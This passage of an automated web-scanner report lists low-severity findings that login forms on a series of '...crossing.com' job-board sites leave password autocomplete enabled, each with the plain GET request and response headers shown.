Host: www.contractmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:33 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=fsi5mhj5680mc16iu88s1m9v73; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:33 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111832

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.contractmanagementcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.32. http://www.counselingcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.counselingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL: http://www.counselingcrossing.com/index.php
The form contains the following password field with autocomplete enabled: clslogin_password

Request

GET / HTTP/1.1
Host: www.counselingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=lgk9crdg1goruniholj5urn963; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149300

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.counselingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.33. http://www.cpluspluscrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cpluspluscrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL: http://www.cpluspluscrossing.com/index.php
The form contains the following password field with autocomplete enabled: clslogin_password

Request

GET / HTTP/1.1
Host: www.cpluspluscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:52 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=j0ddtd9qvkbq5g8p17jjmqsi44; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:52 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114789

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.cpluspluscrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.34. http://www.customerservicecrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.customerservicecrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL: http://www.customerservicecrossing.com/index.php
The form contains the following password field with autocomplete enabled: clslogin_password

Request

GET / HTTP/1.1
Host: www.customerservicecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:04 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=e126ahin8nno4266rg114hr8q7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:05 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119384

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.customerservicecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.35. http://www.dbacrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dbacrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL: http://www.dbacrossing.com/index.php
The form contains the following password field with autocomplete enabled: clslogin_password

Request

GET / HTTP/1.1
Host: www.dbacrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:08 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ks0hq7i64reib4jv7s3j12ces0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:08 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125721

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.dbacrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.36. http://www.dentalcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dentalcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL: http://www.dentalcrossing.com/index.php
The form contains the following password field with autocomplete enabled: clslogin_password

Request

GET / HTTP/1.1
Host: www.dentalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:08 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=od1eunkj1a6cadocmt8bfbgt55; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:08 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111827

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.dentalcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.37. http://www.designingcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.designingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL: http://www.designingcrossing.com/index.php
The form contains the following password field with autocomplete enabled: clslogin_password

Request

GET / HTTP/1.1
Host: www.designingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:17 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=3h4obslpuiqaf86r78fndl2ip2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:17 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 122676

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.designingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.38. http://www.diversitycrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.diversitycrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL: http://www.diversitycrossing.com/index.php
The form contains the following password field with autocomplete enabled: clslogin_password

Request

GET / HTTP/1.1
Host: www.diversitycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:25 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=oh70k7g7bb01l9sdpsaq85rgq4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:25 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 135908

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.diversitycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.39. http://www.dotnetcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dotnetcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL: http://www.dotnetcrossing.com/index.php
The form contains the following password field with autocomplete enabled: clslogin_password

Request

GET / HTTP/1.1
Host: www.dotnetcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:28 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=r5bbu9cr0v14lapurelqu9r7t1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:28 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111450

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.dotnetcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.40. http://www.ecommercecrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ecommercecrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL: http://www.ecommercecrossing.com/index.php
The form contains the following password field with autocomplete enabled: clslogin_password

Request

GET / HTTP/1.1
Host: www.ecommercecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:39 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=jkaapevh1eqi41fjlqg0qqj0f4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 122922

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.ecommercecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.41. http://www.editingcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.editingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL: http://www.editingcrossing.com/index.php
The form contains the following password field with autocomplete enabled: clslogin_password

Request

GET / HTTP/1.1
Host: www.editingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9718dh1vf5ni8ge10ijt7ncv93; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114100

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.editingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.42. http://www.educationcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.educationcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL: http://www.educationcrossing.com/index.php
The form contains the following password field with autocomplete enabled: clslogin_password

Request

GET / HTTP/1.1
Host: www.educationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:49 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=cv80umbmrn1jnbk6im77qu8nf1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:49 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 112625

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.educationcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
